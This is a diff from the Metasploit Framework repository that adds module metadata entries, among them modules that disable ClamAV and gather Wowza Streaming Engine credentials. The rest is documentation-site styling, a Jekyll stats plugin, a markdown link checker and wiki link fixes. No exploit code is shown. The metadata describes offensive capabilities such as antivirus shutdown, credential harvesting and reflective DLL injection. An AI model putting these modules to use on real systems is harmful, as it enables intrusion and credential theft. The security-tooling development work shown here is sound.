      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -207447,7 +208012,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTP (Windows x64 winhttp)",
+    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nTunnel communication over HTTP (Windows x64 winhttp)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -207483,7 +208048,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged). Tunnel communication over HTTPS (Windows x64 winhttp)",
+    "description": "Inject a VNC Dll via a reflective loader (Windows x64) (staged).\n\nTunnel communication over HTTPS (Windows x64 winhttp)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -209905,6 +210470,52 @@
    ],
    "needs_cleanup": null
  },
+  "post_linux/manage/disable_clamav": {
+    "name": "Disable ClamAV",
+    "fullname": "post/linux/manage/disable_clamav",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "DLL_Cool_J"
+    ],
+    "description": "This module will write to the ClamAV Unix socket to shutoff ClamAV.",
+    "references": [
+
+    ],
+    "platform": "Linux",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-02-23 20:57:19 +0000",
+    "path": "/modules/post/linux/manage/disable_clamav.rb",
+    "is_install_path": true,
+    "ref_name": "linux/manage/disable_clamav",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "service-resource-loss"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": [
+      "meterpreter",
+      "shell"
+    ],
+    "needs_cleanup": null
+  },
  "post_linux/manage/dns_spoofing": {
    "name": "Native DNS Spoofing module",
    "fullname": "post/linux/manage/dns_spoofing",
@@ -212028,6 +212639,54 @@
    ],
    "needs_cleanup": null
  },
+  "post_multi/gather/wowza_streaming_engine_creds": {
+    "name": "Gather Wowza Streaming Engine Credentials",
+    "fullname": "post/multi/gather/wowza_streaming_engine_creds",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "post",
+    "author": [
+      "bcoles <bcoles@gmail.com>"
+    ],
+    "description": "This module collects Wowza Streaming Engine user credentials.",
+    "references": [
+      "URL-https://www.wowza.com/docs/use-http-providers-with-the-wowza-streaming-engine-java-api",
+      "URL-https://www.wowza.com/resources/WowzaStreamingEngine_UsersGuide-4.0.5.pdf"
+    ],
+    "platform": "Linux,OSX,Unix,Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-03-09 01:31:23 +0000",
+    "path": "/modules/post/multi/gather/wowza_streaming_engine_creds.rb",
+    "is_install_path": true,
+    "ref_name": "multi/gather/wowza_streaming_engine_creds",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": [
+      "meterpreter",
+      "powershell",
+      "shell"
+    ],
+    "needs_cleanup": null
+  },
  "post_multi/general/close": {
    "name": "Multi Generic Operating System Session Close",
    "fullname": "post/multi/general/close",
@@ -218815,7 +219474,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-02-08 13:47:34 +0000",
+    "mod_time": "2023-02-14 11:21:05 +0000",
    "path": "/modules/post/windows/gather/enum_ad_users.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/enum_ad_users",
@@ -1,29 +1,2 @@
-<style>
-#main-content p {
-    text-align: justify;
-}
+<link rel="stylesheet" href="{% link assets/css/main.css %}">

-.language-mermaid .label {
-    text-transform: inherit;
-}
-
-.language-msf .zp {
-    text-decoration: underline;
-}
-
-.language-msf .ze {
-    color: #960050;
-}
-
-.language-msf .zg {
-    color: #859900;
-}
-
-.language-msf .zs {
-    color: #268bd2;
-}
-
-.language-msf .zw {
-    color: orange;
-}
-</style>
@@ -0,0 +1,60 @@
+// Handle opening/closing module overview list items
+jtd.onReady(function(ready) {
+    var forEach = function (list, callback) {
+        for (var i = 0; i < list.length; i++) {
+            callback(list[i])
+        }
+    };
+
+    // Bind listeners for expand all / collapse all functionality
+    var bindToggleAll = function (selector, options) {
+        var isOpen = options.open;
+        var expandAllButtons = document.querySelectorAll(selector);
+        forEach(expandAllButtons, function (button) {
+            jtd.addEvent(button, 'click', function (e) {
+                var originalTarget = e.target || e.srcElement || e.originalTarget;
+                if (originalTarget.tagName !== 'A') { return; }
+
+                var moduleList = originalTarget.closest('.module-list');
+                forEach(moduleList.querySelectorAll('.folder > ul'), function (list) {
+                    if (isOpen) {
+                        list.classList.add('open');
+                    } else {
+                        list.classList.remove('open');
+                    }
+                })
+
+                e.preventDefault();
+            });
+        });
+    };
+    bindToggleAll('.module-list [data-expand-all]', { open: true })
+    bindToggleAll('.module-list [data-collapse-all]', { open: false })
+
+    // Bind listeners for collapsing module navigation items
+    var moduleStructureElements = document.querySelectorAll('.module-structure');
+    forEach(moduleStructureElements, function (moduleStructure) {
+        jtd.addEvent(moduleStructure, 'click', function (e) {
+            var originalTarget = e.target || e.srcElement || e.originalTarget;
+            if (originalTarget.tagName !== 'A') { return; }
+
+            var parentListItem = originalTarget.closest('li');
+            if (parentListItem.className.indexOf('folder') === -1) { return; }
+
+            toggleChildModuleList(parentListItem)
+            e.preventDefault();
+        });
+    })
+
+    var toggleChildModuleList = function (parent) {
+        var list = parent.querySelector('ul');
+        if (!list) {
+            return;
+        }
+        list.classList.toggle('open');
+        // Recursively automatically open any nested lists of size 1
+        if (list.children.length === 1) {
+            toggleChildModuleList(list.children[0])
+        }
+    }
+});
@@ -0,0 +1,159 @@
+require 'jekyll'
+require 'json'
+require 'pathname'
+
+#
+# Helper class for extracting information related to Metasploit framework's stats
+#
+class MetasploitStats
+  def total_module_count
+    modules.length
+  end
+
+  # @return [Hash<String, Integer>] A map of module type to the amount of modules
+  def module_counts
+    module_counts_by_type = modules.group_by { |mod| mod['type'].to_s }.transform_values { |mods| mods.count }.sort_by(&:first).to_h
+    module_counts_by_type
+  end
+
+  # @return [Array<Hash<String, Hash>>] A nested array of module metadata, containing at least the keys :name, :total, :children
+  def nested_module_counts
+    create_nested_module_counts(modules)
+  end
+
+  protected
+
+  # @param [Array<Hash>] modules
+  # @param [String] parent_path The parent path to track the nesting depth when called recursively
+  #   i.e. auxiliary, then auxiliary/admin, then auxiliary/admin/foo, etc
+  def create_nested_module_counts(modules, parent_path = '')
+    # Group the modules by their prefix, i.e. auxiliary/payload/encoder/etc
+    top_level_buckets = modules.select { |mod| mod['fullname'].start_with?(parent_path) }.group_by do |mod|
+      remaining_paths = mod['fullname'].gsub(parent_path.empty? ? '' : %r{^#{parent_path}/}, '').split('/')
+      remaining_paths[0]
+    end.sort.to_h
+
+    top_level_buckets.map do |(prefix, children)|
+      current_path = parent_path.empty? ? prefix : "#{parent_path}/#{prefix}"
+      mod = modules_by_fullname[current_path]
+      {
+        name: prefix,
+        total: children.count,
+        module_fullname: mod ?  mod['fullname'] : nil,
+        module_path: mod ? mod['path'] : nil,
+        children: mod.nil? ? create_nested_module_counts(children, current_path) : []
+      }
+    end
+  end
+
+  # @return [Array<Hash>] An array of Hashes containing each Metasploit module's metadata
+  def modules
+    return @modules if @modules
+
+    module_metadata_path = '../db/modules_metadata_base.json'
+    unless File.exist?(module_metadata_path)
+      raise "Unable to find Metasploit module data, expected it to be at #{module_metadata_path}"
+    end
+
+    @modules = JSON.parse(File.binread(module_metadata_path)).values
+    @modules
+  end
+
+  # @return [Hash<String, Hash>] A mapping of module name to Metasploit module metadata
+  def modules_by_fullname
+    @modules_by_fullname ||= @modules.each_with_object({}) do |mod, hash|
+      fullname = mod['fullname']
+      hash[fullname] = mod
+    end
+  end
+end
+
+# Custom liquid filter implementation for visualizing nested Metasploit module metadata
+#
+# Intended usage:
+# {{ site.metasploit_nested_module_counts | module_tree }}
+module ModuleFilter
+  # @param [Array<Hash>] modules The array of Metasploit cache information
+  # @return [String] The module tree HTML representation of the given modules
+  def module_tree(modules, title = 'Modules', show_controls = false)
+    rendered_children = render_modules(modules)
+    controls = <<~EOF
+        <div class="module-controls">
+            <span><a href="#" data-expand-all>Expand All</a></span>
+            <span><a href="#" data-collapse-all>Collapse All</a></span>
+        </div>
+    EOF
+
+    <<~EOF
+      <div class="module-list">
+        #{show_controls ? controls : ''}
+
+        <ul class="module-structure">
+          <li class="folder"><a href=\"#\"><div class=\"target\">#{title}</div></a>
+            <ul class="open">
+              #{rendered_children}
+            </ul>
+          </li>
+        </ul>
+      </div>
+    EOF
+  end
+
+  module_function
+
+  # @param [Array<Hash>] modules The array of Metasploit cache information
+  # @return [String] The rendered tree HTML representation of the given modules
+  def render_modules(modules)
+    modules.map do |mod|
+      classes = render_child_modules?(mod) ? ' class="folder"' : ''
+      result = "<li#{classes}>#{heading_for_mod(mod)}"
+      if render_child_modules?(mod)
+        result += "\n<ul>#{render_modules(mod[:children].sort_by { |mod| "#{render_child_modules?(mod) ? 0 : 1}-#{mod[:name]}" })}</ul>\n"
+      end
+      result += "</li>"
+      result
+    end.join("\n")
+  end
+
+  # @param [Hash] mod The module metadata object
+  # @return [String] Human readable string for a module list such as `- <a>Auxiliary (1234)</a>` or `- Other (50)`
+  def heading_for_mod(mod)
+    if render_child_modules?(mod)
+      "<a href=\"#\"><div class=\"target\">#{mod[:name]} (#{mod[:total]})</div></a>"
+    else
+      config = Jekyll.sites.first.config
+      # Preference linking to module documentation over the module implementation
+      module_docs_path = Pathname.new("documentation").join(mod[:module_path].gsub(/^\//, '')).sub_ext(".md")
+      link_path = File.exist?(File.join('..', module_docs_path)) ? "/#{module_docs_path}" : mod[:module_path]
+      docs_link = "#{config['gh_edit_repository']}/#{config['gh_edit_view_mode']}/#{config['gh_edit_branch']}#{link_path}"
+      "<a href=\"#{docs_link}\" target=\"_blank\"><div class=\"target\">#{mod[:module_fullname]}</div></a>"
+    end
+  end
+
+  # @param [Hash] mod The module metadata object
+  # @return [TrueClass, FalseClass]
+  def render_child_modules?(mod)
+    mod[:children].length >= 1 && mod[:module_path].nil?
+  end
+end
+
+# Register the Liquid filter so any Jekyll page can render module information
+Liquid::Template.register_filter(ModuleFilter)
+
+# Register the site initialization hook to populate global site information so any Jekyll page can access Metasploit stats information
+Jekyll::Hooks.register :site, :after_init do |site|
+  begin
+    Jekyll.logger.info 'Calculating module stats'
+
+    metasploit_stats = MetasploitStats.new
+
+    site.config['metasploit_total_module_count'] = metasploit_stats.total_module_count
+    site.config['metasploit_module_counts'] = metasploit_stats.module_counts
+    site.config['metasploit_nested_module_counts'] = metasploit_stats.nested_module_counts
+
+    Jekyll.logger.info 'Finished calculating module stats'
+  rescue
+    Jekyll.logger.error "Unable to to extractMetasploit stats"
+    raise
+  end
+end
@@ -0,0 +1,133 @@
+---
+---
+
+#main-content p {
+    text-align: justify;
+}
+
+/* Color highlighting for msf console text */
+.language-mermaid .label {
+    text-transform: inherit;
+}
+
+.language-msf .zp {
+    text-decoration: underline;
+}
+
+.language-msf .ze {
+    color: #960050;
+}
+
+.language-msf .zg {
+    color: #859900;
+}
+
+.language-msf .zs {
+    color: #268bd2;
+}
+
+.language-msf .zw {
+    color: orange;
+}
+
+/* Module overview styles */
+
+.module-structure li::before {
+    content: ' ' !important;
+}
+
+.module-structure a {
+    height: 100%;
+    padding: 0.2rem;
+    background-image: none;
+    overflow: initial;
+    display: inline-block;
+    width: 90%;
+}
+
+.module-controls {
+    line-height: 0;
+    border-bottom: 1px solid #ddd;
+}
+
+.module-controls a {
+    line-height: 1;
+    padding: 0.5rem;
+    display: inline-block;
+}
+
+.module-controls span {
+    display: inline-block;
+}
+
+.module-structure a, .module-structure a:hover {
+    background-image: none;
+}
+
+.module-structure a .target {
+    pointer-events: none;
+    display: inline-block;
+    text-decoration: none;
+}
+
+.module-structure a:hover .target {
+    background-image: linear-gradient(rgba(114, 83, 237, 0.45) 0%, rgba(114, 83, 237, 0.45) 100%);
+    background-repeat: repeat-x;
+    background-position: 0 100%;
+    background-size: 1px 1px;
+}
+
+.module-structure {
+    line-height: 2rem;
+}
+
+/* visual indentation lines */
+.module-structure ul {
+    margin-left: 7px !important;
+    padding-left: 20px !important;
+    border-left: 1px dashed #d1d7de;
+}
+
+/* Never allow the top-most files/folders to be collapsed */
+.module-structure > li.folder > ul {
+    display: block;
+}
+
+.module-structure li p {
+    margin: 0;
+}
+
+.module-structure li {
+    margin: 0;
+    list-style: none;
+}
+
+.module-structure ul {
+    display: none;
+    margin: 0;
+}
+
+.module-structure ul.open {
+    display: block;
+}
+
+/* Default li style - files */
+.module-structure li::before {
+    background-image: url("data:image/svg+xml;utf8,<svg xmlns='http://www.w3.org/2000/svg' fill='%234158bf' viewBox='0 0 512 512'><path d='M320 464c8.8 0 16-7.2 16-16V160H256c-17.7 0-32-14.3-32-32V48H64c-8.8 0-16 7.2-16 16V448c0 8.8 7.2 16 16 16H320zM0 64C0 28.7 28.7 0 64 0H229.5c17 0 33.3 6.7 45.3 18.7l90.5 90.5c12 12 18.7 28.3 18.7 45.3V448c0 35.3-28.7 64-64 64H64c-35.3 0-64-28.7-64-64V64z'/></svg>");
+    background-repeat: no-repeat;
+    width: 1rem;
+    height: 1rem;
+    background-position: center top;
+    background-size: 90% auto;
+    margin-top: 0;
+    vertical-align: middle;
+    margin-left: initial !important;
+    margin-right: 0.5rem !important;
+    display: inline-block !important;
+    position: initial !important;
+}
+
+/* li style - folders */
+.module-structure li.folder::before {
+    background-image: url("data:image/svg+xml;utf8,<svg xmlns='http://www.w3.org/2000/svg' fill='%234158bf' viewBox='0 0 512 512'><path d='M64 480H448c35.3 0 64-28.7 64-64V160c0-35.3-28.7-64-64-64H288c-10.1 0-19.6-4.7-25.6-12.8L243.2 57.6C231.1 41.5 212.1 32 192 32H64C28.7 32 0 60.7 0 96V416c0 35.3 28.7 64 64 64z'/></svg>");
+}
@@ -3,13 +3,14 @@ require 'uri'
 require 'open3'
 require 'optparse'
 require 'did_you_mean'
+require 'kramdown'
 require_relative './navigation'

 # This build module was used to migrate the old Metasploit wiki https://github.com/rapid7/metasploit-framework/wiki into a format
 # supported by Jekyll. Jekyll was chosen as it was written in Ruby, which should reduce the barrier to entry for contributions.
 #
 # The build script took the flatlist of markdown files from the wiki, and converted them into the hierarchical folder structure
-# for nested documentation. This configuration is defiend in `navigation.rb`
+# for nested documentation. This configuration is defined in `navigation.rb`
 #
 # In the future a different site generator could be used, but it should be possible to use this build script again to migrate to a new format
 #
@@ -158,6 +159,10 @@ module Build
      @links = {}
    end

+    def syntax_errors_for(markdown)
+      MarkdownLinkSyntaxVerifier.errors_for(markdown)
+    end
+
    def extract(markdown)
      extracted_absolute_wiki_links = extract_absolute_wiki_links(markdown)
      @links = @links.merge(extracted_absolute_wiki_links)
@@ -367,6 +372,68 @@ module Build
    end
  end

+  # Verifies that markdown links are not relative. Instead the Github wiki flavored syntax should be used.
+  #
+  # Example bad: `[Human readable text](./some-documentation-link)`
+  # Example good: `[[Human readable text|./some-documentation-link]]`
+  class MarkdownLinkSyntaxVerifier
+    # Detects the usage of bad syntax and returns an array of detected errors
+    #
+    # @param [String] markdown The markdown
+    # @return [Array<String>] An array of human readable errors that should be resolved
+    def self.errors_for(markdown)
+      document = Kramdown::Document.new(markdown)
+      document.to_validated_wiki_page
+      warnings = document.warnings.select { |warning| warning.start_with?(Kramdown::Converter::ValidatedWikiPage::WARNING_PREFIX) }
+      warnings
+    end
+
+    # Implementation detail: There doesn't seem to be a generic AST visitor pattern library for Ruby; We instead implement
+    # Kramdown's Markdown to HTML Converter API, override the link converter method, and warn on any invalid links that are identified.
+    # The {MarkdownLinkVerifier} will ignore the HTML result, and return any detected errors instead.
+    #
+    # https://kramdown.gettalong.org/rdoc/Kramdown/Converter/Html.html
+    class Kramdown::Converter::ValidatedWikiPage < Kramdown::Converter::Html
+      WARNING_PREFIX = '[WikiLinkValidation]'
+
+      def convert_a(el, indent)
+        link_href = el.attr['href']
+        if relative_link?(link_href)
+          link_text = el.children.map { |child| convert(child) }.join
+          warning "Invalid docs link syntax found on line #{el.options[:location]}: Invalid relative link #{link_href} found. Please use the syntax [[#{link_text}|#{link_href}]] instead"
+        end
+
+        if absolute_docs_link?(link_href)
+          begin
+            example_path = ".#{URI.parse(link_href).path}"
+          rescue URI::InvalidURIError
+            example_path = "./path-to-markdown-file"
+          end
+
+          link_text = el.children.map { |child| convert(child) }.join
+          warning "Invalid docs link syntax found on line #{el.options[:location]}: Invalid absolute link #{link_href} found. Please use relative links instead, i.e. [[#{link_text}|#{example_path}]] instead"
+        end
+
+        super
+      end
+
+      private
+
+      def warning(text)
+        super "#{WARNING_PREFIX} #{text}"
+      end
+
+      def relative_link?(link_path)
+        !(link_path.start_with?('http:') || link_path.start_with?('https:') || link_path.start_with?('mailto:') || link_path.start_with?('#'))
+      end
+
+      # @return [TrueClass, FalseClass] True if the link is to a Metasploit docs page that isn't either the root home page or the API site, otherwise false
+      def absolute_docs_link?(link_path)
+        link_path.include?('docs.metasploit.com') && !link_path.include?('docs.metasploit.com/api') && !(link_path == 'https://docs.metasploit.com/')
+      end
+    end
+  end
+
  # Parses a wiki page and can add/remove/update a deprecation notice
  class WikiDeprecationText
    MAINTAINER_MESSAGE_PREFIX = "<!-- Maintainers: "
@@ -461,13 +528,25 @@ module Build

    def link_corrector_for(config)
      link_corrector = LinkCorrector.new(config)
+      errors = []
      config.each do |page|
        unless page[:path].nil?
          content = File.read(File.join(WIKI_PATH, page[:path]), encoding: Encoding::UTF_8)
+          syntax_errors = link_corrector.syntax_errors_for(content)
+          errors << { path: page[:path], messages: syntax_errors } if syntax_errors.any?
+
          link_corrector.extract(content)
        end
      end

+      if errors.any?
+        errors.each do |error|
+          $stderr.puts "[!] Error #{File.join(WIKI_PATH, error[:path])}:\n#{error[:messages].map { |message| "\t- #{message}\n" }.join}"
+        end
+
+        raise "Errors found in markdown syntax"
+      end
+
      link_corrector
    end
  end
@@ -1,4 +1,4 @@
-This page lists the keys in use by [Metasploit committers][msf-committers] and
+This page lists the keys in use by [[Metasploit committers|committer-rights]] and
 can be used to verify merge commits made to <https://github.com/rapid7/metasploit-framework>.

 # Keybase.io identities
@@ -118,7 +118,6 @@ Enter passphrase: [...]

 Using `git c` and `git m` from now on will sign every commit with your `DEADBEEF` key. However, note that rebasing or cherry-picking commits will change the commit hash, and therefore, unsign the commit -- to resign the most recent, use `git c --amend`.

-[msf-committers]:https://docs.metasploit.com/docs/development/maintainers/committer-rights.html
 [pro-sharing]:https://filippo.io/on-keybase-dot-io-and-encrypted-private-key-sharing/
 [con-sharing]:https://www.tbray.org/ongoing/When/201x/2014/03/19/Keybase#p-5
 [tracking]:https://github.com/keybase/keybase-issues/issues/100
@@ -1,7 +1,7 @@
 Metasploit includes a library for leveraging .NET deserialization attacks. Using
 it within a module is very straight forward, the module author just needs to
 know two things: the gadget chain and the formatter. The library uses the same
-names for each of these values as the [YSoSerial.NET][1] project for
+names for each of these values as the [YSoSerial.NET][ysoserial] project for
 compatibility, although the Metasploit library only supports a subset of the
 functionality.

@@ -69,7 +69,7 @@ serialized = ::Msf::Util::DotNetDeserialization.generate(
 The library also has an interface available as a standalone command line tool
 which is suitable for creating payloads for single-use research purposes. This
 tool `dot_net.rb` is available in the `tools/payloads/ysoserial` directory. The
-arguments for this tool are aligned with those of [YSoSerial.NET][1], allowing
+arguments for this tool are aligned with those of [YSoSerial.NET][ysoserial], allowing
 the arguments of basic invocations to be the same. It should be noted however
 that the [supported](#support-matrix) gadgets and formatters are not the same.

@@ -109,13 +109,13 @@ generate functions while the `-f` / `--formatter` arguments maps to the
 ## Making Changes

 Adding new gadget chains and formatters involves creating a new file in the
-respective library directory: [`lib/msf/util/dot_net_deserialization`][2]. The
-"native" gadget chain type is implemented following the [MS-NRBF][3] format and
-the [Bindata][4] records as defined in [`types/`][5] subdirectory. Once the new
+respective library directory: [`lib/msf/util/dot_net_deserialization`][dot-net-deserialization-root]. The
+"native" gadget chain type is implemented following the [MS-NRBF] format and
+the [Bindata][] records as defined in [`types/`][dot-net-deserialization-types] subdirectory. Once the new
 gadget chain or formatter is implemented, it needs to be added to the main
-library file ([`dot_net_deserialization.rb`][6]).
+library file ([`dot_net_deserialization.rb`][dot-net-deserialization-rb]).

-Since serialization chain generate is deterministic, a [unit test][7] should be
+Since serialization chain generate is deterministic, a [unit test][unit-test] should be
 added for any new gadget chain to ensure that the checksum of the
 BinaryFormatter representation is consistent.

@@ -124,15 +124,13 @@ Since the .NET deserialization gadgets run operating system commands, the
 following resources can be helpful for module developers to deliver native
 payloads such as Meterpreter.

-* [How to use command stagers][8]
-* [How to use Powershell in an exploit][9]
+* [[How to use command stagers|./how-to-use-command-stagers.md]]
+* [[How to use Powershell in an exploit|./how-to-use-powershell-in-an-exploit.md]]

-[1]: https://github.com/pwntester/ysoserial.net
-[2]: https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/util/dot_net_deserialization
-[3]: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrbf/75b9fe09-be15-475f-85b8-ae7b7558cfe5
-[4]: https://github.com/dmendel/bindata
-[5]: https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/util/dot_net_deserialization/types
-[6]: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/util/dot_net_deserialization.rb
-[7]: https://github.com/rapid7/metasploit-framework/blob/master/spec/lib/msf/util/dot_net_deserialization_spec.rb
-[8]: https://docs.metasploit.com/docs/development/developing-modules/guides/how-to-use-command-stagers.html
-[9]: https://docs.metasploit.com/docs/development/developing-modules/libraries/how-to-use-powershell-in-an-exploit.html
+[ysoserial]: https://github.com/pwntester/ysoserial.net
+[dot-net-deserialization-root]: https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/util/dot_net_deserialization
+[MS-NRBF]: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-nrbf/75b9fe09-be15-475f-85b8-ae7b7558cfe5
+[Bindata]: https://github.com/dmendel/bindata
+[dot-net-deserialization-types]: https://github.com/rapid7/metasploit-framework/tree/master/lib/msf/util/dot_net_deserialization/types
+[dot-net-deserialization-rb]: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/util/dot_net_deserialization.rb
+[unit-test]: https://github.com/rapid7/metasploit-framework/blob/master/spec/lib/msf/util/dot_net_deserialization_spec.rb
@@ -24,7 +24,7 @@ Difficulty: 4/5

 ### LDAP Capture Capabilities

-Metasploit's LDAP service mixin provides a service to enable interaction over the LDAP protocol. The current implementation is the bare minimum to enable support for attacking the [2021 Log4Shell vulnerability](). Enhancement/Extension of the mixin to enable various additional LDAP features would enable extended usage of this service for additional tasks. Support for various protocol level authentication methods would allow Metasploit to intercept and log authentication information. Specific items of interest are [SPNEGO](https://en.wikipedia.org/wiki/SPNEGO) and [StartTLS](https://ldapwiki.com/wiki/StartTLS) support to enable compatibility with the widest variety of clients and a new capture module that log authentication information from clients.
+Metasploit's LDAP service mixin provides a service to enable interaction over the LDAP protocol. The current implementation is the bare minimum to enable support for attacking the [2021 Log4Shell vulnerability](https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell?referrer=msf_docs). Enhancement/Extension of the mixin to enable various additional LDAP features would enable extended usage of this service for additional tasks. Support for various protocol level authentication methods would allow Metasploit to intercept and log authentication information. Specific items of interest are [SPNEGO](https://en.wikipedia.org/wiki/SPNEGO) and [StartTLS](https://ldapwiki.com/wiki/StartTLS) support to enable compatibility with the widest variety of clients and a new capture module that log authentication information from clients.

 Size: Medium  
 Difficulty: 3/5
@@ -58,7 +58,7 @@ Difficulty: 4/5

 Enhance existing Metasploit Goliath dashboard that allows observation of an active engagement. Data visualization would include, but not be limited to: host node graph with activity indicators and heat maps. The main idea here is to create a visualization tool that helps users understand data that has been gathered into Metasploit during usage in some useful way. Proposals should note where the service will live, how a user will use the service, and how you will provide a maintainable and extendable consumer for the data that is exposed.

-See [Metasploit 'Goliath' Demo (msf-red)](https://www.youtube.com/watch?v=hvuy6A-ie1g&feature=youtu.be&t=176) for a demo video of Goliath in action. You can also read more on Metasploit Goliath at [Metasploit-Data-Service-Enhancements-(Goliath)](./Metasploit-Data-Service-Enhancements-Goliath)
+See [Metasploit 'Goliath' Demo (msf-red)](https://www.youtube.com/watch?v=hvuy6A-ie1g&feature=youtu.be&t=176) for a demo video of Goliath in action. You can also read more on Metasploit Goliath at [[Metasploit-Data-Service-Enhancements-(Goliath)|./Metasploit-Data-Service-Enhancements-Goliath]

 Size: Medium/Large (Depends on proposal)  
 Difficulty 3/5
@@ -17,18 +17,11 @@ Difficulty: 4/5

 ### LDAP Capture Capabilities

-Metasploit's LDAP service mixin provides a service to enable interaction over the LDAP protocol. The current implementation is the bare minimum to enable support for attacking the [2021 Log4Shell vulnerability](). Enhancement/Extension of the mixin to enable various additional LDAP features would enable extended usage of this service for additional tasks. Support for various protocol level authentication methods would allow Metasploit to intercept and log authentication information. Specific items of interest are [SPNEGO](https://en.wikipedia.org/wiki/SPNEGO) and [StartTLS](https://ldapwiki.com/wiki/StartTLS) support to enable compatibility with the widest variety of clients and a new capture module that log authentication information from clients.
+Metasploit's LDAP service mixin provides a service to enable interaction over the LDAP protocol. The current implementation is the bare minimum to enable support for attacking the [2021 Log4Shell vulnerability](https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell?referrer=msf_docs). Enhancement/Extension of the mixin to enable various additional LDAP features would enable extended usage of this service for additional tasks. Support for various protocol level authentication methods would allow Metasploit to intercept and log authentication information. Specific items of interest are [SPNEGO](https://en.wikipedia.org/wiki/SPNEGO) and [StartTLS](https://ldapwiki.com/wiki/StartTLS) support to enable compatibility with the widest variety of clients and a new capture module that log authentication information from clients.

 Size: Medium  
 Difficulty: 3/5

-### Enhanced LDAP Query & Collection
-
-When preforming security assessment on a network with centralized login such as LDAP or Active Directory these services are sometimes exposed directly on the network. While Metasploit has capabilities to collect various pieces of information from these services when a user has been able to gain code execution inside a target system by utilizing tooling such as `Sharphound` or by leveraging SMB services via the `secrets_dump` module, these methods are somewhat indirect. A network base capability to query exposed services may have value. An interactive terminal plugin allowing users to connect directly to LDAP or Active Directory providing capabilities similar to the existing `requests` plugin could enable users search for valuable information in these services without the need to compromise a target or interact with a secondary service. 
-
-Size: Medium/Large (Depends on proposal)  
-Difficulty: 3/5
-
 ### Improving post-exploit API to be more consistent, work smoothly across session types

 The Metasploit post-exploitation API is intended to provide a unified interface between different Meterpreter, shell, PowerShell, mainframe, and other session types. However, there are areas where the implementation is not consistent, and could use improvements:
@@ -51,9 +44,9 @@ Difficulty: 4/5

 Enhance existing Metasploit Goliath dashboard that allows observation of an active engagement. Data visualization would include, but not be limited to: host node graph with activity indicators and heat maps. The main idea here is to create a visualization tool that helps users understand data that has been gathered into Metasploit during usage in some useful way. Proposals should note where the service will live, how a user will use the service, and how you will provide a maintainable and extendable consumer for the data that is exposed.

-See [Metasploit 'Goliath' Demo (msf-red)](https://www.youtube.com/watch?v=hvuy6A-ie1g&feature=youtu.be&t=176) for a demo video of Goliath in action. You can also read more on Metasploit Goliath at [Metasploit-Data-Service-Enhancements-(Goliath)](./Metasploit-Data-Service-Enhancements-Goliath)
+See [Metasploit 'Goliath' Demo (msf-red)](https://www.youtube.com/watch?v=hvuy6A-ie1g&feature=youtu.be&t=176) for a demo video of Goliath in action. You can also read more on Metasploit Goliath at [[Metasploit-Data-Service-Enhancements-(Goliath)|./Metasploit-Data-Service-Enhancements-Goliath]]

-Size: Medium/Large (Depends on proposal)  
+Size: Medium/Large (Depends on proposal)
 Difficulty 3/5

 ## Submit your own
@@ -20,7 +20,7 @@ This may sound surprising, but sometimes we get asked questions that are already

 * **Which ones have been tested**: When a module is developed, usually the exploit isn't tested against every single setup if there are too many. Usually the developers will just try to test whatever they can get their hands on. So if your target isn't mentioned here, keep in mind there is no guarantee it's going to work 100%. The safest thing to do is to actually recreate the environment your target has, and test the exploit before hitting the real thing.

-* **What conditions the server must meet in order to be exploitable**: Quite often, a vulnerability requires multiple conditions to be exploitable. In some cases you can rely on the exploit's [check command](How-to-write-a-check-method.md), because when Metasploit flags something as vulnerable, it actually exploited the bug. For browser exploits using the BrowserExploitServer mixin, it will also check exploitable requirements before loading the exploit. But automation isn't always there, so you should try to find this information before running that "exploit" command. Sometimes it's just common sense, really. For example: a web application's file upload feature might be abused to upload a web-based backdoor, and stuff like that usually requires the upload folder to be accessible for the user. If your target doesn't meet the requirement(s), there is no point to try.
+* **What conditions the server must meet in order to be exploitable**: Quite often, a vulnerability requires multiple conditions to be exploitable. In some cases you can rely on the exploit's [[check command|How-to-write-a-check-method.md]], because when Metasploit flags something as vulnerable, it actually exploited the bug. For browser exploits using the BrowserExploitServer mixin, it will also check exploitable requirements before loading the exploit. But automation isn't always there, so you should try to find this information before running that "exploit" command. Sometimes it's just common sense, really. For example: a web application's file upload feature might be abused to upload a web-based backdoor, and stuff like that usually requires the upload folder to be accessible for the user. If your target doesn't meet the requirement(s), there is no point to try.

 You can use the info command to see the module's description:

@@ -0,0 +1,56 @@
